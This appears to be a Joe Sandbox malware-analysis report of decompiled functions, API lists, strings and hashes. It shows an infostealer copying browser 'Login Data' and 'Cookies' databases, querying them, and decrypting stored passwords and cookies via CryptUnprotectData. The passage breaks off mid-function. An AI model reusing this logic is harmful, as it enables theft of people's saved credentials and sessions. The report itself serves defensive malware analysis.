				void* _v20;
				WCHAR* _v24;
				void* _v28;
				signed int _v32;
				WCHAR* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* _v60;
				signed int _v64;
				char _v68;
				intOrPtr* _v72;
				void* _v76;
				void* _v80;
				char _v84;
				void* _v88;
				char _v92;
				void* _v96;
				char _v100;
				char* _v104;
				char* _v108;
				intOrPtr _v112;
				char _v116;
				void* _t135;
				void* _t136;
				void* _t147;
				void* _t149;
				intOrPtr _t155;
				intOrPtr _t157;
				intOrPtr _t159;
				intOrPtr _t161;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t167;
				intOrPtr _t169;
				void* _t172;
				int _t176;
				void* _t178;
				void* _t180;
				void* _t185;
				void* _t189;
				signed int _t190;
				intOrPtr _t192;
				intOrPtr _t193;
				intOrPtr _t194;
				intOrPtr _t195;
				intOrPtr _t196;
				void* _t199;
				void* _t200;
				void* _t203;
				WCHAR* _t204;
				void* _t209;
				void* _t212;
				int _t215;
				int _t226;
				intOrPtr _t228;
				void* _t236;
				void* _t240;
				WCHAR* _t241;
				intOrPtr* _t242;
				void* _t246;
				void* _t288;
				signed int _t289;
				signed int _t290;
				void* _t294;
				void* _t295;
				intOrPtr _t297;
				void* _t302;
				void* _t303;

				_v60 = __edx;
				_v72 = __ecx;
				_t135 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
				_t136 =  *((intOrPtr*)( *0x40e044))(0x40, 0x200);
				_t288 = _t136;
				_v12 = _v12 & 0x00000000;
				_v64 = _t288;
				_t240 =  *((intOrPtr*)( *0x40e13c))(_a12);
				E004017FA(_t240,  &_v12,  &_v68);
				_t246 = _t135;
				E00401934(_v12,  &_v64, _t246, _v68);
				_v32 = _v32 & 0x00000000;
				_v80 = _t288;
				_v84 = 0x200;
				_t294 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
				_v28 = _t294;
				if(_v12 != 0) {
					LocalFree(_v12);
				}
				_t250 =  *0x40e0b0;
				_t147 =  *((intOrPtr*)( *0x40e0b0))( &_v84,  &_v32, 0, 0, 0, 0,  &_v92); // executed
				if(_t147 != 0) {
					_t236 = E0040177F(_v88,  &_v28, _v92);
					_t294 = _v28;
					_pop(_t250);
					if(_t236 != 0) {
						StrCpyW( *_v60, _t294);
					}
				}
				if(_t294 != 0) {
					LocalFree(_t294);
				}
				if(_v80 != 0) {
					LocalFree(_v80);
				}
				if(_v32 != 0) {
					LocalFree(_v32);
				}
				if(_v88 != 0) {
					LocalFree(_v88);
				}
				if(_t240 != 0) {
					LocalFree(_t240);
				}
				_t149 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_t289 = 0;
				_v108 = L"Network\\Cookies";
				_t295 = _t149;
				_v104 = L"Cookies";
				_v64 = 0;
				do {
					_t295 =  *((intOrPtr*)( *0x40e000))(_t295, _a8,  *((intOrPtr*)(_t302 + _t289 * 4 - 0x68)));
					_v76 = _t295;
					if(_a16 == 0) {
						goto L25;
					}
					_t155 =  *((intOrPtr*)( *0x40e0d4))(_a16,  *0x40e1c4);
					 *0x40e4d4 = _t155;
					_t157 =  *((intOrPtr*)( *0x40e0d4))(_a16,  *0x40e1f8);
					 *0x40e4c8 = _t157;
					_t159 =  *((intOrPtr*)( *0x40e0d4))(_a16,  *0x40e208);
					 *0x40e4c4 = _t159;
					_t161 =  *((intOrPtr*)( *0x40e0d4))(_a16,  *0x40e230);
					 *0x40e4cc = _t161;
					_t163 =  *((intOrPtr*)( *0x40e0d4))(_a16,  *0x40e1e0);
					 *0x40e4bc = _t163;
					_t165 =  *((intOrPtr*)( *0x40e0d4))(_a16,  *0x40e1c0);
					 *0x40e4b8 = _t165;
					_t167 =  *((intOrPtr*)( *0x40e0d4))(_a16,  *0x40e224);
					 *0x40e4c0 = _t167;
					_t169 =  *((intOrPtr*)( *0x40e0d4))(_a16,  *0x40e1b0);
					 *0x40e4d0 = _t169;
					_v36 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
					_t172 = E0040A69E(_t250,  &_v36);
					_t241 = _v36;
					if(_t172 == 0) {
						L23:
						DeleteFileW(_t241); // executed
						L24:
						LocalFree(_t241);
						goto L25;
					}
					_t176 = CopyFileW(_t295, _t241, 0); // executed
					if(_t176 == 0) {
						goto L23;
					}
					_t178 =  *0x40e4c8( &_v28); // executed
					_t250 = _t241;
					if(_t178 == 0 && _v28 != _t178) {
						_t180 =  *0x40e4d4(_v28,  *0x40e218, 0xffffffff,  &_v8, _t178); // executed
						_t303 = _t303 + 0x14;
						_push(_v8);
						if(_t180 == 0) {
							if( *0x40e4cc() != 0x64) {
								L54:
								 *0x40e4bc(_v8);
								 *0x40e4c4(_v28); // executed
								_pop(_t250);
								DeleteFileW(_t241); // executed
								if(_t241 == 0) {
									goto L25;
								}
								goto L24;
							}
							_t242 = _v72;
							do {
								_t185 =  *0x40e4c0(_v8, 0);
								 *0x40e4c0(_v8, 1);
								 *0x40e4c0(_v8, 2);
								 *0x40e4c0(_v8, 3);
								_t189 =  *0x40e4c0(_v8, 4);
								_v60 = _t189;
								_t190 =  *0x40e4c0(_v8, 5);
								_t303 = _t303 + 0x30;
								_t290 = _t190;
								if(_t185 >= 1 && (_v60 >= 1 || _t290 >= 1)) {
									_t192 =  *0x40e4b8(_v8, 0);
									_v56 = _t192;
									_t193 =  *0x40e4b8(_v8, 1);
									_v52 = _t193;
									_t194 =  *0x40e4b8(_v8, 2);
									_v48 = _t194;
									_t195 =  *0x40e4b8(_v8, 3);
									_v44 = _t195;
									_t196 =  *0x40e4b8(_v8, 4);
									_t303 = _t303 + 0x28;
									_v40 = _t196;
									if(_t290 <= 0) {
										goto L52;
									}
									_t297 =  *0x40e4d0(_v8, 5);
									_t80 = _t290 + 0x40; // 0x40
									_t199 =  *((intOrPtr*)( *0x40e044))(0x40, _t80);
									_t200 =  *((intOrPtr*)( *0x40e050))(_t199, _t297);
									_v60 = _t200;
									_v16 =  *_t200;
									_v15 =  *((intOrPtr*)(_t200 + 1));
									_v14 =  *((intOrPtr*)(_t200 + 2));
									_v13 = 0;
									if(_t297 == 0) {
										L51:
										LocalFree(_t200);
										goto L52;
									}
									_t203 = LocalAlloc(0x40, 0x4000); // executed
									_v12 = _t203;
									_t204 =  *0x40e21c; // 0x60d990
									_v24 = _t204;
									_push("v10");
									_push( &_v16);
									if( *((intOrPtr*)( *0x40e084))() != 0) {
										_push( &_v100);
										_v112 = _t297;
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_v116 = 0x200;
										_push( &_v116);
										if( *((intOrPtr*)( *0x40e0b0))() == 0) {
											L48:
											_t209 = _v12;
											if(_t209 != 0) {
												LocalFree(_t209);
											}
											_t200 = _v60;
											goto L51;
										}
										 *((char*)(_v100 + _v96)) = 0;
										_t212 = E0040A4C2(_v96);
										_v20 = _t212;
										 *((intOrPtr*)( *0x40e0a0))(_v48, "1", _v44, _v40, _t212);
										_t269 =  !=  ? L"FALSE" : L"TRUE";
										_t215 = wsprintfW(_v12, _v24, _v56, _v52,  !=  ? L"FALSE" : L"TRUE");
										_t303 = _t303 + 0x20;
										if(_t215 >= lstrlenW(_v24)) {
											 *_t242 = E0040A503( *_t242, _v12);
										}
										if(_v96 != 0) {
											LocalFree(_v96);
										}
										L47:
										LocalFree(_v20);
										goto L48;
									}
									_v20 =  *((intOrPtr*)( *0x40e044))(0x40, 0x100 + _t290 * 4);
									if(E0040177F(_t297,  &_v20, _t290) != 0) {
										 *((intOrPtr*)( *0x40e0a0))(_v48, "1");
										_t275 =  !=  ? L"FALSE" : L"TRUE";
										_t226 = wsprintfW(_v12, _v24, _v56, _v52,  !=  ? L"FALSE" : L"TRUE", _v44, _v40, _v20);
										_t303 = _t303 + 0x20;
										if(_t226 >= lstrlenW(_v24)) {
											_t228 = E0040A503( *_t242, _v12); // executed
											 *_t242 = _t228;
										}
									}
									if(_v20 == 0) {
										goto L48;
									} else {
										goto L47;
									}
								}
								L52:
								_push(_v8);
							} while ( *0x40e4cc() == 0x64);
							_t241 = _v36;
							_t295 = _v76;
							_t289 = _v64;
							goto L54;
						}
						 *0x40e4bc();
						 *0x40e4c4(_v28);
						_pop(_t250);
					}
					goto L23;
					L25:
					_t289 = _t289 + 1;
					_v64 = _t289;
				} while (_t289 < 2);
				if(_t295 != 0) {
					LocalFree(_t295);
				}
				return 0;
			}

0x00402ccd
0x00402cd0
0x00402cd3
0x00402ce4
0x00402cef
0x00402cf1
0x00402cf6
0x00402cfb
0x00402d06
0x00402d0b
0x00402d16
0x00402d20
0x00402d2d
0x00402d30
0x00402d3d
0x00402d3f
0x00402d42
0x00402d47
0x00402d47
0x00402d4d
0x00402d65
0x00402d69
0x00402d74
0x00402d79
0x00402d7c
0x00402d7f
0x00402d87
0x00402d87
0x00402d7f
0x00402d8f
0x00402d92
0x00402d92
0x00402d9c
0x00402da1
0x00402da1
0x00402dab
0x00402db0
0x00402db0
0x00402dba
0x00402dbf
0x00402dbf
0x00402dc7
0x00402dca
0x00402dca
0x00402ddc
0x00402dde
0x00402de0
0x00402de7
0x00402de9
0x00402df0
0x00402df3
0x00402e06
0x00402e08
0x00402e0b
0x00000000
0x00000000
0x00402e1f
0x00402e27
0x00402e34
0x00402e3c
0x00402e49
0x00402e51
0x00402e5e
0x00402e66
0x00402e73
0x00402e7b
0x00402e88
0x00402e90
0x00402e9d
0x00402ea5
0x00402eb2
0x00402eb9
0x00402eca
0x00402ecd
0x00402ed2
0x00402ed7
0x00402f2f
0x00402f30
0x00402f36
0x00402f37
0x00000000
0x00402f37
0x00402ee2
0x00402ee6
0x00000000
0x00000000
0x00402eed
0x00402ef4
0x00402ef7
0x00402f0e
0x00402f14
0x00402f17
0x00402f1c
0x00402f66
0x0040320e
0x00403211
0x0040321a
0x00403221
0x00403223
0x0040322b
0x00000000
0x00000000
0x00000000
0x00403231
0x00402f6c
0x00402f6f
0x00402f74
0x00402f81
0x00402f8c
0x00402f97
0x00402fa2
0x00402fad
0x00402fb0
0x00402fb6
0x00402fb9
0x00402fbe
0x00402fd8
0x00402fe3
0x00402fe6
0x00402ff1
0x00402ff4
0x00402fff
0x00403002
0x0040300d
0x00403010
0x00403016
0x00403019
0x0040301e
0x00000000
0x00000000
0x00403037
0x00403039
0x0040303f
0x00403049
0x0040304b
0x00403050
0x00403056
0x0040305c
0x0040305f
0x00403065
0x004031eb
0x004031ec
0x00000000
0x004031ec
0x00403077
0x0040307f
0x00403082
0x00403087
0x0040308d
0x00403092
0x00403097
0x00403135
0x00403138
0x0040313b
0x0040313c
0x0040313d
0x0040313e
0x0040313f
0x00403143
0x0040314a
0x0040314f
0x004031da
0x004031da
0x004031df
0x004031e2
0x004031e2
0x004031e8
0x00000000
0x004031e8
0x0040315b
0x0040315f
0x0040317a
0x00403188
0x00403196
0x004031a6
0x004031a8
0x004031b4
0x004031c0
0x004031c0
0x004031c6
0x004031cb
0x004031cb
0x004031d1
0x004031d4
0x00000000
0x004031d4
0x004030b3
0x004030c0
0x004030d5
0x004030f2
0x00403102
0x00403104
0x00403110
0x00403117
0x0040311c
0x0040311c
0x00403110
0x00403122
0x00000000
0x00403128
0x00000000
0x00403128
0x00403122
0x004031f2
0x004031f2
0x004031fc
0x00403205
0x00403208
0x0040320b
0x00000000
0x0040320b
0x00402f1e
0x00402f27
0x00402f2e
0x00402f2e
0x00000000
0x00402f3d
0x00402f3d
0x00402f3e
0x00402f41
0x00402f4c
0x00402f4f
0x00402f4f
0x00402f5b

APIs

LocalFree.KERNEL32(00000000), ref: 00402D47

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

CryptUnprotectData.CRYPT32(00000200,00000000,00000000,00000000,00000000,00000000,?), ref: 00402D65
StrCpyW.SHLWAPI(?,?), ref: 00402D87
LocalFree.KERNEL32(00000000), ref: 00402D92
LocalFree.KERNEL32(00000000), ref: 00402DA1
LocalFree.KERNEL32(00000000), ref: 00402DB0
LocalFree.KERNEL32(00000000), ref: 00402DBF
LocalFree.KERNEL32(00000000), ref: 00402DCA
CopyFileW.KERNEL32(00000000,?,00000000), ref: 00402EE2
DeleteFileW.KERNEL32(?), ref: 00402F30
LocalFree.KERNEL32(?), ref: 00402F37
LocalFree.KERNEL32(00000000), ref: 00402F4F
LocalAlloc.KERNEL32(00000040,00004000), ref: 00403077
wsprintfW.USER32 ref: 00403102
lstrlenW.KERNEL32(00000000), ref: 0040310C
wsprintfW.USER32 ref: 004031A6
lstrlenW.KERNEL32(00000000), ref: 004031B0
LocalFree.KERNEL32(00000000), ref: 004031CB
LocalFree.KERNEL32(?), ref: 004031D4
LocalFree.KERNEL32(00000000), ref: 004031E2
LocalFree.KERNEL32(00000000), ref: 004031EC
DeleteFileW.KERNEL32(?), ref: 00403223

Strings

@]_, xrefs: 00402E11
v10, xrefs: 0040308D
Network\Cookies, xrefs: 00402DE0
`[_, xrefs: 00402E60
FALSE, xrefs: 004030E5, 00403191
TRUE, xrefs: 004030EA, 004030F5, 0040318C, 00403199
Cookies, xrefs: 00402DE9

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$File$Deletelstrlenwsprintf$AllocCopyCryptDataUnprotect
String ID: @]_$Cookies$FALSE$Network\Cookies$TRUE$`[_$v10
API String ID: 3838148118-844481549
Opcode ID: 850273a0fde415f3e16bf2cb4ff4f090ffafe71236387fc93c72d7a9b68f77d6
Instruction ID: 518071ebf78736c82c0705b89313a0bc18143e80e42b499cd2370e7bd490f6e3
Opcode Fuzzy Hash: 850273a0fde415f3e16bf2cb4ff4f090ffafe71236387fc93c72d7a9b68f77d6
Instruction Fuzzy Hash: A3024C71900219EFDF059FA2EE49AAE7BB5FB08301F104839E911B72A0D7759D20DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004027B8 Relevance: 51.2, APIs: 25, Strings: 4, Instructions: 419
filememoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 26%

			E004027B8(intOrPtr* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, char _a16) {
				signed int _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				void* _v16;
				WCHAR* _v20;
				void* _v24;
				signed int _v28;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				void* _v48;
				char _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				char _v72;
				void* _v76;
				char _v80;
				void* _v84;
				char _v88;
				void* _t103;
				void* _t104;
				void* _t115;
				intOrPtr _t118;
				intOrPtr _t120;
				intOrPtr _t122;
				intOrPtr _t124;
				intOrPtr _t126;
				intOrPtr _t128;
				intOrPtr _t130;
				void* _t134;
				void* _t135;
				void* _t137;
				int _t142;
				void* _t144;
				void* _t146;
				void* _t153;
				void* _t154;
				signed int _t155;
				intOrPtr _t157;
				intOrPtr _t158;
				void* _t160;
				void* _t161;
				WCHAR* _t165;
				void* _t173;
				void* _t174;
				int _t175;
				void* _t184;
				int _t185;
				void* _t190;
				void* _t199;
				intOrPtr* _t203;
				void* _t204;
				intOrPtr* _t205;
				void* _t253;
				signed int _t255;
				void* _t258;
				void* _t259;
				void* _t260;
				char _t261;
				void* _t263;
				void* _t265;
				signed int _t266;
				void* _t267;
				intOrPtr* _t270;
				void* _t271;

				_t203 = __edx;
				_v44 = __ecx;
				_t103 = LocalAlloc(0x40, 0x400); // executed
				_t104 =  *((intOrPtr*)( *0x40e13c))(_t103, _a12);
				_v8 = _v8 & 0x00000000;
				_t253 = _t104;
				E004017FA(_t253,  &_v8,  &_v52);
				 *_t270 = 0x200;
				_t259 =  *((intOrPtr*)( *0x40e044))(0x40);
				_v48 = _t259;
				E00401934(_v8,  &_v48,  *0x40e044, _v52);
				_v28 = _v28 & 0x00000000;
				_v60 = _t259;
				_v64 = 0x200;
				_t260 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
				_v24 = _t260;
				if(_v8 != 0) {
					LocalFree(_v8);
				}
				_t115 =  *((intOrPtr*)( *0x40e0b0))( &_v64,  &_v28, 0, 0, 0, 0,  &_v72); // executed
				if(_t115 != 0) {
					_t199 = E0040177F(_v68,  &_v24, _v72);
					_t260 = _v24;
					if(_t199 != 0) {
						 *_t203 =  *((intOrPtr*)( *0x40e13c))( *_t203, _t260);
					}
				}
				if(_v28 != 0) {
					LocalFree(_v28);
				}
				if(_v60 != 0) {
					LocalFree(_v60);
				}
				if(_v68 != 0) {
					LocalFree(_v68);
				}
				if(_t260 != 0) {
					LocalFree(_t260);
				}
				if(_t253 != 0) {
					LocalFree(_t253);
				}
				_t261 = _a16;
				if(_t261 == 0) {
					L57:
					return 0;
				} else {
					_t118 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1c4);
					 *0x40e4d4 = _t118;
					_t120 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1f8);
					 *0x40e4c8 = _t120;
					_t122 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1e0);
					 *0x40e4bc = _t122;
					_t124 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e208);
					 *0x40e4c4 = _t124;
					_t126 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e230);
					 *0x40e4cc = _t126;
					_t128 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1c0);
					 *0x40e4b8 = _t128;
					_t130 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e224);
					 *0x40e4c0 = _t130;
					 *0x40e4d0 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1b0);
					_t134 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
					_t135 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
					_v32 = _t135;
					_t263 =  *((intOrPtr*)( *0x40e000))(_t134, _a8, L"Login Data");
					_v56 = _t263;
					_t137 = E0040A69E( *0x40e000,  &_v32);
					_t204 = _v32;
					if(_t137 == 0) {
						L59:
						LocalFree(_t263);
						DeleteFileW(_t204);
						return LocalFree(_t204) | 0xffffffff;
					}
					_t142 = CopyFileW(_t263, _t204, 0); // executed
					if(_t142 == 0) {
						goto L59;
					}
					_t144 =  *0x40e4c8(_t204,  &_v24); // executed
					if(_t144 == 0) {
						if(_v24 != 0) {
							_t146 =  *0x40e4d4(_v24,  *0x40e1fc, 0xffffffff,  &_a16, 0); // executed
							_t271 = _t270 + 0x14;
							if(_t146 == 0) {
								_push(_a16);
								if( *0x40e4cc() != 0x64) {
									L53:
									if(_t263 != 0) {
										LocalFree(_t263);
									}
									 *0x40e4bc(_a16);
									 *0x40e4c4(_v24); // executed
									DeleteFileW(_t204); // executed
									if(_t204 != 0) {
										LocalFree(_t204);
									}
									goto L57;
								}
								_t205 = _v44;
								do {
									_t153 =  *0x40e4c0(_a16, 0);
									_t154 =  *0x40e4c0(_a16, 1);
									_v48 = _t154;
									_t155 =  *0x40e4c0(_a16, 2);
									_t271 = _t271 + 0x18;
									_t255 = _t155;
									if(_t153 >= 1 && (_v48 >= 1 || _t255 >= 1)) {
										_t157 =  *0x40e4b8(_a16, 0);
										_v44 = _t157;
										_t158 =  *0x40e4b8(_a16, 1);
										_t271 = _t271 + 0x10;
										_v40 = _t158;
										if(_t255 <= 0) {
											goto L51;
										}
										_t265 =  *0x40e4d0(_a16, 2);
										_t54 = _t255 + 0x40; // 0x40
										_v36 = _t265;
										_t160 =  *((intOrPtr*)( *0x40e044))(0x40, _t54);
										_t161 =  *((intOrPtr*)( *0x40e050))(_t160, _t265);
										_v48 = _t161;
										_v12 =  *_t161;
										_v11 =  *((intOrPtr*)(_t161 + 1));
										_v10 =  *((intOrPtr*)(_t161 + 2));
										_v9 = 0;
										if(_t265 == 0) {
											L50:
											LocalFree(_t161);
											goto L51;
										}
										_t266 =  *((intOrPtr*)( *0x40e044))(0x40, 0x2000);
										_t165 =  *0x40e1a4; // 0x60d510
										_v20 = _t165;
										_push("v10");
										_push( &_v12);
										_v8 = _t266;
										if( *((intOrPtr*)( *0x40e084))() != 0) {
											_push( &_v80);
											_v84 = _v36;
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											_v88 = 0x200;
											_push( &_v88);
											if( *((intOrPtr*)( *0x40e0b0))() == 0) {
												_t267 = _v8;
												L47:
												if(_t267 != 0) {
													LocalFree(_t267);
												}
												_t161 = _v48;
												goto L50;
											}
											 *((char*)(_v80 + _v76)) = 0;
											_t173 = E0040A4C2(_v76);
											_v36 = _t173;
											_t174 =  *((intOrPtr*)( *0x40e0ec))(_t266, _v20, _v44, _v40, _t173);
											_t271 = _t271 + 0x14;
											_t175 = lstrlenW(_v20);
											_t267 = _v8;
											if(_t174 >= _t175) {
												 *_t205 = E0040A503( *_t205, _t267);
											}
											if(_v76 != 0) {
												LocalFree(_v76);
											}
											LocalFree(_v36);
											L39:
											goto L47;
										}
										_v16 =  *((intOrPtr*)( *0x40e044))(0x40, _t255 << 2);
										if(E0040177F(_v36,  &_v16, _t255) == 0) {
											_t267 = _v8;
										} else {
											_t184 =  *((intOrPtr*)( *0x40e0ec))(_t266, _v20, _v44, _v40, _v16);
											_t271 = _t271 + 0x14;
											_t185 = lstrlenW(_v20);
											_t267 = _v8;
											if(_t184 >= _t185) {
												 *_t205 = E0040A503( *_t205, _t267);
											}
										}
										if(_v16 == 0) {
											goto L47;
										} else {
											LocalFree(_v16);
											goto L39;
										}
									}
									L51:
									_push(_a16);
								} while ( *0x40e4cc() == 0x64);
								_t204 = _v32;
								_t263 = _v56;
								goto L53;
							}
							LocalFree(_t263);
							LocalFree(_t204);
							 *0x40e4c4(_v24);
							_t190 = 0xfffffffd;
							return _t190;
						}
						_t258 = 0xfffffffe;
						L22:
						LocalFree(_t263);
						LocalFree(_t204);
						return _t258;
					}
					_t258 = 0xffffffffffffffff;
					goto L22;
				}
			}

0x004027cd
0x004027cf
0x004027d2
0x004027de
0x004027e0
0x004027e7
0x004027ef
0x004027fa
0x00402808
0x00402811
0x00402814
0x0040281e
0x0040282b
0x0040282e
0x0040283b
0x0040283d
0x00402840
0x00402845
0x00402845
0x00402863
0x00402867
0x00402872
0x00402877
0x0040287d
0x00402889
0x00402889
0x0040287d
0x0040288f
0x00402894
0x00402894
0x0040289e
0x004028a3
0x004028a3
0x004028ad
0x004028b2
0x004028b2
0x004028ba
0x004028bd
0x004028bd
0x004028c5
0x004028c8
0x004028c8
0x004028ce
0x004028d3
0x00402c97
0x00000000
0x004028d9
0x004028e5
0x004028ed
0x004028f8
0x00402900
0x0040290b
0x00402913
0x0040291e
0x00402926
0x00402931
0x00402939
0x00402944
0x0040294c
0x00402957
0x0040295f
0x00402971
0x0040297e
0x0040298b
0x0040299b
0x004029a1
0x004029a6
0x004029a9
0x004029ae
0x004029b3
0x00402c9e
0x00402c9f
0x00402ca6
0x00000000
0x00402cb3
0x004029c3
0x004029c7
0x00000000
0x00000000
0x004029d2
0x004029dc
0x004029e7
0x00402a12
0x00402a18
0x00402a1d
0x00402a3f
0x00402a4c
0x00402c66
0x00402c68
0x00402c6b
0x00402c6b
0x00402c74
0x00402c7d
0x00402c86
0x00402c8e
0x00402c91
0x00402c91
0x00000000
0x00402c8e
0x00402a52
0x00402a55
0x00402a5a
0x00402a67
0x00402a72
0x00402a75
0x00402a7b
0x00402a7e
0x00402a83
0x00402a9d
0x00402aa8
0x00402aab
0x00402ab1
0x00402ab4
0x00402ab9
0x00000000
0x00000000
0x00402ad0
0x00402ad4
0x00402ad7
0x00402add
0x00402ae7
0x00402ae9
0x00402aee
0x00402af4
0x00402afa
0x00402afd
0x00402b03
0x00402c46
0x00402c47
0x00000000
0x00402c47
0x00402b1d
0x00402b1f
0x00402b24
0x00402b2a
0x00402b2f
0x00402b30
0x00402b37
0x00402bb6
0x00402bb9
0x00402bc1
0x00402bc2
0x00402bc3
0x00402bc4
0x00402bc5
0x00402bc9
0x00402bd0
0x00402bd5
0x00402c35
0x00402c38
0x00402c3a
0x00402c3d
0x00402c3d
0x00402c43
0x00000000
0x00402c43
0x00402bdd
0x00402be1
0x00402bf6
0x00402c00
0x00402c02
0x00402c0a
0x00402c0e
0x00402c11
0x00402c1c
0x00402c1c
0x00402c22
0x00402c27
0x00402c27
0x00402ba5
0x00402ba5
0x00000000
0x00402ba5
0x00402b50
0x00402b5b
0x00402b95
0x00402b5d
0x00402b75
0x00402b77
0x00402b7f
0x00402b83
0x00402b86
0x00402b91
0x00402b91
0x00402b86
0x00402b9c
0x00000000
0x00402ba2
0x00402ba5
0x00000000
0x00402ba5
0x00402b9c
0x00402c4d
0x00402c4d
0x00402c57
0x00402c60
0x00402c63
0x00000000
0x00402c63
0x00402a20
0x00402a27
0x00402a30
0x00402a39
0x00000000
0x00402a39
0x004029eb
0x004029ec
0x004029ed
0x004029f4
0x00000000
0x004029fa
0x004029de
0x00000000
0x004029de

APIs

LocalAlloc.KERNEL32(00000040,00000400,?,?,00000000), ref: 004027D2
LocalFree.KERNEL32(00000000), ref: 00402845

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

CryptUnprotectData.CRYPT32(00000200,00000000,00000000,00000000,00000000,00000000,?), ref: 00402863
LocalFree.KERNEL32(00000000), ref: 00402894
LocalFree.KERNEL32(00000000), ref: 004028A3
LocalFree.KERNEL32(00000000), ref: 004028B2
LocalFree.KERNEL32(00000000), ref: 004028BD
LocalFree.KERNEL32(00000000), ref: 004028C8
CopyFileW.KERNEL32(00000000,?,00000000), ref: 004029C3
LocalFree.KERNEL32(00000000), ref: 004029ED
LocalFree.KERNEL32(?), ref: 004029F4
LocalFree.KERNEL32(00000000), ref: 00402A20
LocalFree.KERNEL32(?), ref: 00402A27
LocalFree.KERNEL32(00000000), ref: 00402C9F
DeleteFileW.KERNEL32(?), ref: 00402CA6
LocalFree.KERNEL32(?), ref: 00402CAD

Strings

@]_, xrefs: 004028D9
Login Data, xrefs: 00402993
v10, xrefs: 00402B2A
`[_, xrefs: 004028FA

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$File$AllocCopyCryptDataDeleteUnprotect
String ID: @]_$Login Data$`[_$v10
API String ID: 2012866857-2811000478
Opcode ID: b6a73bfcd7fa19a61caf5a3942f5a47526ff64dca62d6261f18b42a1d5e00d55
Instruction ID: 1f8185af0f1f67a55c4789a30ea30f5b3919f5d8761e9684d4856192d3457fc8
Opcode Fuzzy Hash: b6a73bfcd7fa19a61caf5a3942f5a47526ff64dca62d6261f18b42a1d5e00d55
Instruction Fuzzy Hash: 25F18071900225EFDB05DFA6DE48AAE7BB5FB08310F144935F515B72E0CBB89920CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00403236 Relevance: 47.7, APIs: 24, Strings: 3, Instructions: 437
fileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 18%

			E00403236(intOrPtr* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, char _a16) {
				signed int _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				void* _v16;
				WCHAR* _v20;
				void* _v24;
				signed int _v28;
				void* _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				void* _v52;
				char _v56;
				void* _v60;
				void* _v64;
				char _v68;
				void* _v72;
				char _v76;
				void* _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				void* _t107;
				void* _t108;
				void* _t119;
				intOrPtr _t122;
				intOrPtr _t124;
				intOrPtr _t126;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t132;
				intOrPtr _t134;
				void* _t138;
				void* _t139;
				void* _t141;
				int _t146;
				void* _t148;
				void* _t150;
				intOrPtr _t157;
				intOrPtr _t158;
				intOrPtr _t159;
				signed int _t160;
				void* _t161;
				void* _t167;
				void* _t168;
				WCHAR* _t172;
				signed int _t179;
				void* _t180;
				int _t181;
				void* _t190;
				int _t191;
				void* _t196;
				void* _t205;
				intOrPtr* _t209;
				void* _t210;
				intOrPtr* _t211;
				void* _t265;
				void* _t268;
				intOrPtr _t269;
				void* _t273;
				void* _t274;
				void* _t275;
				char _t276;
				void* _t278;
				signed int _t279;
				signed int _t280;
				void* _t281;
				intOrPtr* _t284;
				void* _t285;

				_t209 = __edx;
				_v48 = __ecx;
				_t107 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
				_t108 =  *((intOrPtr*)( *0x40e13c))(_t107, _a12);
				_v8 = _v8 & 0x00000000;
				_t265 = _t108;
				E004017FA(_t265,  &_v8,  &_v56);
				 *_t284 = 0x200;
				_t274 =  *((intOrPtr*)( *0x40e044))(0x40);
				_v52 = _t274;
				E00401934(_v8,  &_v52,  *0x40e044, _v56);
				_v28 = _v28 & 0x00000000;
				_v64 = _t274;
				_v68 = 0x200;
				_t275 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
				_v24 = _t275;
				if(_v8 != 0) {
					LocalFree(_v8);
				}
